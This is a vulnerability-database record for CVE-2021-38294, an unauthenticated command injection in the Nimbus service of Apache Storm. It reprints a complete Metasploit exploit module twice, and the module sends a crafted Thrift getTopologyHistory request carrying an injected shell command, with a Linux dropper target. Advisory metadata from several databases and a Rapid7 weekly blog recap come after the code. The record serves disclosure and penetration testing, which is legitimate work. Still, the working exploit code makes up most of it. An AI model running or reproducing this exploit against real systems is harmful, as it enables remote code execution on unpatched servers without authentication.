{"id": "PACKETSTORM:165019", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Apache Storm Nimbus 2.2.0 Command Execution", "description": "", "published": "2021-11-19T00:00:00", "modified": "2021-11-19T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/165019/Apache-Storm-Nimbus-2.2.0-Command-Execution.html", "reporter": "Spencer McIntyre", "references": [], "cvelist": ["CVE-2021-38294"], "immutableFields": [], "lastseen": "2021-11-19T16:57:06", "viewCount": 318, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-38294"]}, {"type": "github", "idList": ["GHSA-6768-MCJC-8223"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:DB7AC7E9278AED114B1BBA8DC96DD124"]}, {"type": "zdt", "idList": ["1337DAY-ID-37060"]}], "rev": 4}, "score": {"value": 5.4, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-38294"]}, {"type": "github", "idList": ["GHSA-6768-MCJC-8223"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:DB7AC7E9278AED114B1BBA8DC96DD124"]}, {"type": "zdt", "idList": ["1337DAY-ID-37060"]}]}, "exploitation": null, "vulnersScore": 5.4}, "sourceHref": "https://packetstormsecurity.com/files/download/165019/nimbus_gettopologyhistory_cmd_exec.rb.txt", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'rex/proto/thrift' \nrequire 'rex/stopwatch' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::CmdStager \n \nThrift = Rex::Proto::Thrift \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Apache Storm Nimbus getTopologyHistory Unauthenticated Command Execution', \n'Description' => %q{ \nThis module 
exploits an unauthenticated command injection vulnerability within the Nimbus service component of Apache Storm. \nThe getTopologyHistory RPC method takes a single argument which is the name of a user which is \nconcatenated into a string that is executed by bash. In order for the vulnerability to be exploitable, there \nmust have been at least one topology submitted to the server. The topology may be active or inactive, but at \nleast one must be present. Successful exploitation results in remote code execution as the user running Apache Storm. \n \nThis vulnerability was patched in versions 2.1.1, 2.2.1 and 1.2.4. This exploit was tested on version 2.2.0 \nwhich is affected. \n}, \n'Author' => [ \n'Alvaro Mu\u00f1oz', # discovery and original research \n'Spencer McIntyre', # metasploit module \n], \n'References' => [ \n['CVE', '2021-38294'], \n['URL', 'https://securitylab.github.com/advisories/GHSL-2021-085-apache-storm/'] \n], \n'DisclosureDate' => '2021-10-25', \n'License' => MSF_LICENSE, \n'Platform' => ['linux', 'unix'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper \n} \n] \n], \n'DefaultTarget' => 1, \n'DefaultOptions' => { \n'RPORT' => 6627, \n'MeterpreterTryToFork' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \nend \n \ndef check \nbegin \nconnect \nrescue Rex::ConnectionError \nreturn CheckCode::Unknown('Failed to connect to the service.') \nend \n \nsleep_time = rand(5..10) \nresponse, elapsed_time = Rex::Stopwatch.elapsed_time do \nexecute_command(\"sleep #{sleep_time}\", { disconnect: false }) \nrecv_response(sleep_time + 5) \nend \ndisconnect \n \nvprint_status(\"Elapsed 
time: #{elapsed_time} seconds\") \n \nunless response && elapsed_time > sleep_time \nreturn CheckCode::Safe('Failed to test command injection.') \nend \n \nCheckCode::Appears('Successfully tested command injection.') \nend \n \ndef exploit \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, opts = {}) \n# comment out the rest of the command to ensure it's only executed once and prefix a random tag to avoid caching \ncmd = \"#{cmd} ##{Rex::Text.rand_text_alphanumeric(4..8)}\" \nvprint_status(\"Executing command: #{cmd}\") \n \nsend_request([ \nThrift::Header.new(message_type: Thrift::MessageType::CALL, method_name: 'getTopologyHistory'), \nThrift::Data.new(data_type: Thrift::DataType::T_UTF7, field_id: 1, data_value: \";#{cmd}\"), \nThrift::Data.new \n].map(&:to_binary_s).join) \ndisconnect if opts.fetch(:disconnect, true) \nend \n \ndef send_request(request) \nconnect if sock.nil? \nsock.put([ request.length ].pack('N') + request) \nend \n \ndef recv_response(timeout) \nremaining = timeout \nres_size, elapsed = Rex::Stopwatch.elapsed_time do \nsock.timed_read(4, remaining) \nend \n \nremaining -= elapsed \nreturn nil if res_size.nil? || res_size.length != 4 || remaining <= 0 \n \nres = sock.timed_read(res_size.unpack1('N'), remaining) \n \nreturn nil if res.nil? || res.length != res_size.unpack1('N') \n \nreturn res_size + res \nrescue Timeout::Error \nreturn nil \nend \nend \n`\n", "_state": {"dependencies": 1646108597}}
{"github": [{"lastseen": "2022-04-15T14:32:17", "description": "A Command Injection vulnerability exists in the getTopologyHistory service of the Apache Storm 2.x prior to 2.2.1 and Apache Storm 1.x prior to 1.2.4. A specially crafted thrift request to the Nimbus server allows Remote Code Execution (RCE) prior to authentication.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-27T18:51:22", "type": "github", "title": "Command injection leading to Remote Code Execution in Apache Storm", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38294"], "modified": "2021-11-24T19:39:08", "id": "GHSA-6768-MCJC-8223", "href": "https://github.com/advisories/GHSA-6768-mcjc-8223", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2022-05-12T00:15:04", "description": "storm-server is vulnerable to command injection. 
The vulnerability exists due to the usage of `getTopologyHistory` service which allows malicious users to execute commands without prior authentication.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-26T05:42:55", "type": "veracode", "title": "Command Injection ", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38294"], "modified": "2021-11-23T22:10:31", "id": "VERACODE:32717", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-32717/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2022-06-10T04:57:47", "description": "A Command Injection vulnerability exists in the getTopologyHistory service of the Apache Storm 2.x prior to 2.2.1 and Apache Storm 1.x prior to 1.2.4. 
A specially crafted thrift request to the Nimbus server allows Remote Code Execution (RCE) prior to authentication.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-27T18:51:22", "type": "osv", "title": "Command injection leading to Remote Code Execution in Apache Storm", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38294"], "modified": "2022-06-10T02:17:03", "id": "OSV:GHSA-6768-MCJC-8223", "href": "https://osv.dev/vulnerability/GHSA-6768-mcjc-8223", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T18:58:55", "description": "A Command Injection vulnerability exists in the getTopologyHistory service of the Apache Storm 2.x prior to 2.2.1 and Apache Storm 1.x prior to 1.2.4. 
A specially crafted thrift request to the Nimbus server allows Remote Code Execution (RCE) prior to authentication.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-25T13:15:00", "type": "cve", "title": "CVE-2021-38294", "cwe": ["CWE-77"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38294"], "modified": "2021-11-23T19:44:00", "cpe": [], "id": "CVE-2021-38294", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-38294", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "zdt": [{"lastseen": "2021-12-25T11:17:52", "description": "This Metasploit module exploits an unauthenticated command injection vulnerability within the Nimbus service component of Apache Storm. The getTopologyHistory RPC method takes a single argument which is the name of a user which is concatenated into a string that is executed by bash. In order for the vulnerability to be exploitable, there must have been at least one topology submitted to the server. The topology may be active or inactive, but at least one must be present. 
Successful exploitation results in remote code execution as the user running Apache Storm. This vulnerability was patched in versions 2.1.1, 2.2.1 and 1.2.4. This exploit was tested on version 2.2.0 which is affected.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-20T00:00:00", "type": "zdt", "title": "Apache Storm Nimbus 2.2.0 Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38294"], "modified": "2021-11-20T00:00:00", "id": "1337DAY-ID-37060", "href": "https://0day.today/exploit/description/37060", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/thrift'\nrequire 'rex/stopwatch'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::CmdStager\n\n Thrift = Rex::Proto::Thrift\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Apache Storm Nimbus getTopologyHistory Unauthenticated 
Command Execution',\n 'Description' => %q{\n This module exploits an unauthenticated command injection vulnerability within the Nimbus service component of Apache Storm.\n The getTopologyHistory RPC method takes a single argument which is the name of a user which is\n concatenated into a string that is executed by bash. In order for the vulnerability to be exploitable, there\n must have been at least one topology submitted to the server. The topology may be active or inactive, but at\n least one must be present. Successful exploitation results in remote code execution as the user running Apache Storm.\n\n This vulnerability was patched in versions 2.1.1, 2.2.1 and 1.2.4. This exploit was tested on version 2.2.0\n which is affected.\n },\n 'Author' => [\n 'Alvaro Mu\u00f1oz', # discovery and original research\n 'Spencer McIntyre', # metasploit module\n ],\n 'References' => [\n ['CVE', '2021-38294'],\n ['URL', 'https://securitylab.github.com/advisories/GHSL-2021-085-apache-storm/']\n ],\n 'DisclosureDate' => '2021-10-25',\n 'License' => MSF_LICENSE,\n 'Platform' => ['linux', 'unix'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'DefaultOptions' => {\n 'RPORT' => 6627,\n 'MeterpreterTryToFork' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n end\n\n def check\n begin\n connect\n rescue Rex::ConnectionError\n return CheckCode::Unknown('Failed to connect to the service.')\n end\n\n sleep_time = rand(5..10)\n response, elapsed_time = Rex::Stopwatch.elapsed_time do\n execute_command(\"sleep #{sleep_time}\", { disconnect: false })\n recv_response(sleep_time + 
5)\n end\n disconnect\n\n vprint_status(\"Elapsed time: #{elapsed_time} seconds\")\n\n unless response && elapsed_time > sleep_time\n return CheckCode::Safe('Failed to test command injection.')\n end\n\n CheckCode::Appears('Successfully tested command injection.')\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, opts = {})\n # comment out the rest of the command to ensure it's only executed once and prefix a random tag to avoid caching\n cmd = \"#{cmd} ##{Rex::Text.rand_text_alphanumeric(4..8)}\"\n vprint_status(\"Executing command: #{cmd}\")\n\n send_request([\n Thrift::Header.new(message_type: Thrift::MessageType::CALL, method_name: 'getTopologyHistory'),\n Thrift::Data.new(data_type: Thrift::DataType::T_UTF7, field_id: 1, data_value: \";#{cmd}\"),\n Thrift::Data.new\n ].map(&:to_binary_s).join)\n disconnect if opts.fetch(:disconnect, true)\n end\n\n def send_request(request)\n connect if sock.nil?\n sock.put([ request.length ].pack('N') + request)\n end\n\n def recv_response(timeout)\n remaining = timeout\n res_size, elapsed = Rex::Stopwatch.elapsed_time do\n sock.timed_read(4, remaining)\n end\n\n remaining -= elapsed\n return nil if res_size.nil? || res_size.length != 4 || remaining <= 0\n\n res = sock.timed_read(res_size.unpack1('N'), remaining)\n\n return nil if res.nil? 
|| res.length != res_size.unpack1('N')\n\n return res_size + res\n rescue Timeout::Error\n return nil\n end\nend\n", "sourceHref": "https://0day.today/exploit/37060", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2021-11-26T19:03:33", "description": "## Self-Service Remote Code Execution\n\n\n\nThis week, our own [@wvu-r7](<https://github.com/wvu-r7>) added an exploit [module](<https://github.com/rapid7/metasploit-framework/pull/15874>) that achieves unauthenticated remote code execution in ManageEngine ADSelfService Plus, a self-service password management and single sign-on solution for Active Directory. This new module leverages a REST API authentication bypass vulnerability identified as [CVE-2021-40539](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539?referrer=blog>), where an error in the REST API URL normalization routine makes it possible to bypass security filters and upload arbitrary files on the target. wvu\u2019s new module simply uploads a Java payload to the target and executes it, granting code execution as SYSTEM if ManageEngine ADSelfService Plus was started as a service.\n\n## Storm Alert\n\nWarning, this is not a drill! A critical unauthenticated command injection vulnerability is approaching the Nimbus service component of Apache Storm and has been given the name [CVE-2021-38294](<https://attackerkb.com/topics/xvmqwPRnm5/cve-2021-38294?referrer=blog>). A new exploit [module](<https://github.com/rapid7/metasploit-framework/pull/15866>) authored by our very own [zeroSteiner](<https://github.com/zeroSteiner>) has landed and will exploit this vulnerability to get you OS command execution as the user that started the Nimbus service. Please, evacuate the area immediately!\n\n## Metasploit Community CTF 2021\n\nWe're happy to announce this year\u2019s CTF will start on Friday, December 3, 2021! 
Similar to last year, the game has been designed to be accessible to beginners who want to learn and connect with the community. Keep in mind that while a team can have unlimited members, only 1,000 team spots are available, and once they\u2019re gone you will have to join someone else\u2019s team. You can find the full details in our [blog post](<https://www.rapid7.com/blog/post/2021/11/16/announcing-the-2021-metasploit-community-ctf/>).\n\n## New module content (2)\n\n * [Apache Storm Nimbus getTopologyHistory Unauthenticated Command Execution](<https://github.com/rapid7/metasploit-framework/pull/15866>) by [Alvaro Mu\u00f1oz](<https://github.com/pwntester>) and [Spencer McIntyre](<https://github.com/zeroSteiner>), which exploits [CVE-2021-38294](<https://attackerkb.com/topics/xvmqwPRnm5/cve-2021-38294?referrer=blog>) \\- This adds an exploit for CVE-2021-38294 which is an unauthenticated remote command execution vulnerability within the `getTopologyHistory()` RPC method that is provided by the Nimbus service which is a component of the Apache Storm project. In order to be exploitable, at least one topology must have been submitted to the Storm cluster. 
It may be active or inactive but one must be present.\n * [ManageEngine ADSelfService Plus CVE-2021-40539](<https://github.com/rapid7/metasploit-framework/pull/15874>) by [wvu](<https://github.com/wvu-r7>), [Antoine Cervoise](<https://github.com/cervoise>), [Wilfried B\u00e9card](<https://github.com/wilfried-becard>), and [mr_me](<https://github.com/stevenseeley>), which exploits [CVE-2021-40539](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539?referrer=blog>) \\- This adds an exploit for CVE-2021-40539 which is an unauthenticated RCE within the ManageEngine ADSelfService application.\n\n## Enhancements and features\n\n * [#15887](<https://github.com/rapid7/metasploit-framework/pull/15887>) from [smashery](<https://github.com/smashery>) \\- The path expansion code has been expanded to support path-based tab completion. Users should now tab-complete things such as `cat ~/some_filenam<tab>`.\n * [#15889](<https://github.com/rapid7/metasploit-framework/pull/15889>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- An update has been made to library code so that terminal resize events are only sent if the Meterpreter client supports it. Additionally, extra feedback is now provided to users on whether or not terminal resizing is handled automatically or if they should adjust it manually.\n * [#15898](<https://github.com/rapid7/metasploit-framework/pull/15898>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- Ruby 3.x removes support for `URI.encode` and `URI.escape`. This PR replaces uses of these functions in modules with calls to `URI::DEFAULT_PARSER.escape` so that Ruby 3 can run these modules instead of raising errors about missing functions.\n * [#15899](<https://github.com/rapid7/metasploit-framework/pull/15899>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- This improves the user experience when `shell` is invoked from a Meterpreter session. 
Now, when the `fully_interactive_shells` feature is enabled, a message is displayed to inform the operator that a fully interactive TTY is supported. Note that you can start it by invoking `shell -it`.\n\n## Bugs fixed\n\n * [#15864](<https://github.com/rapid7/metasploit-framework/pull/15864>) from [timwr](<https://github.com/timwr>) \\- A bug has been fixed whereby the `sessions -u` command would not return a x64 Meterpreter session on a x64 Windows host, and would instead return a x86 session. This issue has now been addressed so that `sessions -u` will determine the architecture of the target host prior to upgrading and will generate a new Meterpreter session of the appropriate architecture.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.15...6.1.16](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-11-17T15%3A27%3A48-06%3A00..2021-11-24T18%3A00%3A22-06%3A00%22>)\n * [Full diff 6.1.15...6.1.16](<https://github.com/rapid7/metasploit-framework/compare/6.1.15...6.1.16>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-26T17:21:03", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38294", "CVE-2021-40539"], "modified": "2021-11-26T17:21:03", "id": "RAPID7BLOG:DB7AC7E9278AED114B1BBA8DC96DD124", "href": "https://blog.rapid7.com/2021/11/26/metasploit-wrap-up-140/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}